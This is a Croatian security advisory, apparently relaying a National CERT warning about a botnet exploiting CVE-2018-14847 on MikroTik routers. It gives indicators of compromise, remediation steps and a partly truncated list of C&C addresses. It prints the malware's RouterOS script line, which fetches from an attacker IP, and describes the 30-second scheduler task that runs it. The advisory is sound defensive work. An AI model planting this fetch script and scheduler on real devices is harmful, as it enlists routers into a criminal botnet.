U tijeku je botnet kampanja u kojoj se masovno napadaju MikroTik usmjerivači, priopćili su iz Nacionalnog CERT-a.

Napadi iskorištavaju ranjivost MikroTik RouterOS-a (CVE-2018-14847) za koju je zakrpa izdana 23. travnja 2018. godine. Iskorištavanje ranjivosti napadaču omogućava udaljeno čitanje korisničkih imena i lozinki administratorskih računa na usmjerivaču. Napadi u sklopu te botnet kampanje između ostaloga se koriste i za širenje zlonamjernog softvera za rudarenje kriptovaluta.

Botnet kampanja aktivna je i u Hrvatskoj. Primijećeni su napadi na uređaje u Hrvatskoj unutar zadnjih tjedan dana te postoje znakovi da se zaraženi uređaji koriste za slanje neželjene pošte.

Napadi mogu ostaviti tragove u dnevnicima (logs) u obliku zapisa prijave legitimnih korisničkih računa s neobičnih IP adresa, primjerice:

account user <ime legitimnog korisničkog računa> logged in from 95.154.216.151 via winbox

zlonamjerna skripta u popisu skripta
sadržaj zlonamjerne skripte

Za sanaciju napada, preporučuje se:

  • postavljanje ograničenja na IP adrese koje smiju pristupiti administracijskim servisima usmjerivača,
  • blokiranje poznatih zlonamjernih IP adresa (popis je dostupan niže),
  • brisanje komponenata zlonamjernog softvera s usmjerivača na temelju sada poznatih informacija (dodatne informacije dostupne su niže),
  • ažuriranje usmjerivača na novu, sigurniju inačicu,
  • izmjena lozinki svih korisnika za administraciju usmjerivača.

Za sada su poznate sljedeće IP adrese kontrolnih poslužitelja napadača (C&C servers):

  • 216.151
  • 216.160
  • 216.163
  • 216.165
  • 216.167

Zlonamjerni softver na usmjerivaču može sadržavati sljedeće komponente:

  • skriptu nazvanu script3_ sa sadržajem sljedećeg oblika:

/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

  • zadatak u rasporedu (scheduler) naziva schedule3_ koji svakih 30 sekunda poziva navedenu skriptu
zadatak u rasporedu koji pokreće zlonamjernu skriptu
Podijeli: